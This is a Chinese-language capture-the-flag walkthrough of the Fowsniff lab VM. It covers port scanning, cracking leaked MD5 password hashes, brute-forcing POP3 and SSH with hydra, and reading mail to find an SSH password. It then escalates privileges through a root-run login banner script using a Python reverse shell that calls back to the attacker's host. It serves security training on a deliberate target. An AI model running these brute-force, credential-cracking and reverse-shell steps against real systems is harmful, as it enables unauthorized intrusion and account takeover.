终于放假了~
靶机设置
文件校验:
certutil -hashfile Fowsniff_CTF.ova因为我kali是装在vmware里的,所以需要配置一下,使vmware和virtualbox的虚拟机可以互通。操作参考:vmware与virtualbox虚拟机互通_vmware和virtualbox互联-CSDN博客
Nmap扫描
主机发现
sudo nmap -sn 192.168.56.101/24 
TCP开放端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.56.102
# 22,80,110,143
有两个邮件服务的端口
UDP开放端口扫描
sudo nmap -sU --min-rate 10000 -p- 192.168.56.102
TCP详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.56.102 -oA ./nmap/detail
vuln漏洞脚本扫描
sudo nmap --script=vuln -p22,80,110,143 192.168.56.102 -oA ./nmap/vuln 
Getshell
80-简单浏览
vuln扫描有点慢,我想简单看看。
大概就是他们被攻击了,员工信息被泄露,要求员工改密码。然后服务暂停。啊?
不管了,目录扫描启动!
sudo gobuster dir -u http://192.168.56.102/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
没东西。
but这个时候vuln扫描结束了,很长内容嗷。回去看看。
那个sql注入看起来像是误报,先不管。发现有robots.txt和README.txt嗷。看看去。
啧,怎么都在讲html相关的
回到主界面,看看F12能不能找到CMS相关信息。
也无。
信息泄漏
走不通了,找信息泄露去。去提到的twitter看看:@fowsniffcorp
FowSniffCorp Pwned! (@FowsniffCorp) / X
第一个链接失效了QAQ,不过找到一个备份的:Fowsniff/fowsniff.txt at main · berzerk0/Fowsniff (github.com)
说只用MD5。且这些能进去邮件服务
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7ehashcat破解:hashcat -a 0 -m 0 ./passwd.txt /usr/share/wordlists/rockyou.txt
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
seina@fowsniff:90dc16d47114aa13671c697fd506cf26:scoobydoo2
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11:orlando12
tegel@fowsniff:1dc352435fecca338acfd4be10984009:apples01
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb:skyler22
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4:mailcall
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e:07011972
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101 靠,就这个管理员的没破解出来QAQ。用awk整理成username和password文件。这个就不赘述了(手工也行~)
sudo hydra -L users.txt -P passwd.txt -f 192.168.56.102 pop3
# -f:找到一个就暂停
pop3
用爆破出来的账号密码进行登陆:
sudo nc 192.168.56.102 110pop3命令行操作直接搜,还蛮简单的。
user seina
pass scoobydoo2
# 账户密码登陆
stat
# 查看邮箱状态,回显“+OK 2 2902” => 表示有两封邮件,总共2902字节
retr 1
# 接受第一份邮件。'.'表示邮件结束
关键:
The temporary password for SSH is "S1ck3nBluff+secureshell"
hydra -L users.txt -P ssh_pass.txt ssh://192.168.56.102
ssh连接!
sudo ssh baksteen@192.168.56.102
# S1ck3nBluff+secureshell
提权
简单枚举
find枚举了一堆,唯一的有用信息:
看看是啥:
很眼熟嗷,这就是ssh登进来时的print
ssh-banner提权
传个pspy过去,监控看看:
python3 -m http.server 80
wget http://192.168.56.101/pspy32
chmod +x pspy32
./pspy32
# 然后另起一个ssh连接
可以发现,是uid=0的root执行的cube.sh。
所以提权路径get!
有python3,那就python3
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
然后kali监听,再其一个ssh连接:
拿下!